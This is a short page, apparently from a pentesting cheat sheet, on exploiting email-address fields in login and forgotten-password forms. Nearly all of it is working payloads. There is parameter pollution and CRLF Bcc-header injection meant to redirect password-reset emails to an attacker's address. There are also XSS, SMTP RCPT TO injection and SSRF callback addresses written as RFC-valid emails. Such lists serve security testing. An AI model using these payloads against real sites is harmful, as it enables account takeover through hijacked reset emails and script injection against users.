Email Address Forms

How to exploit login and forgotten password forms.

Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form

Param Manipulation and CRLF Injection

Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:

  • email=user@lol.com&test@test.com

  • email=user@lol.com%26test@test.com

  • email=user@lol.com;test@test.com

  • email=user@lol.com, test@test.com

  • {”email”:”user@lol.com”,”test@test.com”}

  • {”email”:[”user@lol.com”,”test@test.com”]}

  • email=user@lol.com%0D%0ABcc:test@test.com

  • email=user@lol.com%0ABcc:test@test.com

  • email=user@lol.com%0DBcc:test@test.com

  • email=user@lol.com\r\nBcc:test@test.com

  • email=user@lol.com\nBcc:test@test.com

  • email=user@lol.com\rBcc:test@test.com

Other checks (XSS, SSRF, SMTP Manipulation)

Use these payloads (which are all valid email addresses according to the RFC) to find other issues.

  • <svg/onload=alert('XSS')>@test.com

  • test@test(<svg/onload=alert('XSS')>).com

  • "<svg/onload=alert('XSS')>"@test.com

  • "test@gmail.com\r\nRCPT TO:<victim+"@test.com>

  • test@burpcollab.com

  • test@[burpcollab.com]

PreviousAuthenticationNextAWS Cognito

Last updated